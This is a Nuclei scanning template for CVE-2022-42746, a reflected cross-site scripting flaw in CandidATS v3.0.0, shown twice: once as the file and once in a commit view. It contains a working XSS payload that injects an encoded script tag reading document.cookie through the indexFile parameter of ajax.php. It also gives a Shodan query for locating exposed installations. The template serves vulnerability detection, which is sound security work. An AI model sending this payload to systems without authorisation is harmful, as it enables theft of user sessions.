nuclei-templates/cves/2022/CVE-2022-42746.yaml

id: CVE-2022-42746

info:
  name: CandidATS v3.0.0 - Cross Site Scripting.
  author: arafatansari
  severity: Medium
  description: CandidATS v3.0.0 on 'indexFile' of the 'ajax.php' resource, allows an external attacker to steal the cookie of arbitrary users.
  reference:
    - https://fluidattacks.com/advisories/modestep/
  metadata:
    shodan-query: http.html:"CandidATS"
    verified: true
  tags: xss,cve,2022

requests:
  - method: GET
    path:    
      - '{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&isPopup=0'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
            - '<script>alert(document.cookie)</script>'
      
        condition: and
      - type: status
        status:
          - 404
Create CVE-2022-42746.yaml 2022-11-04 13:21:54 +00:00			`id: CVE-2022-42746`

			`info:`
			`name: CandidATS v3.0.0 - Cross Site Scripting.`
			`author: arafatansari`
			`severity: Medium`
			`description: CandidATS v3.0.0 on 'indexFile' of the 'ajax.php' resource, allows an external attacker to steal the cookie of arbitrary users.`
			`reference:`
			`- https://fluidattacks.com/advisories/modestep/`
			`metadata:`
			`shodan-query: http.html:"CandidATS"`
			`verified: true`
			`tags: xss,cve,2022`

			`requests:`
			`- method: GET`
			`path:`
			`- '{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&isPopup=0'`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- '<script>alert(document.cookie)</script>'`

			`condition: and`
			`- type: status`
			`status:`
			`- 404`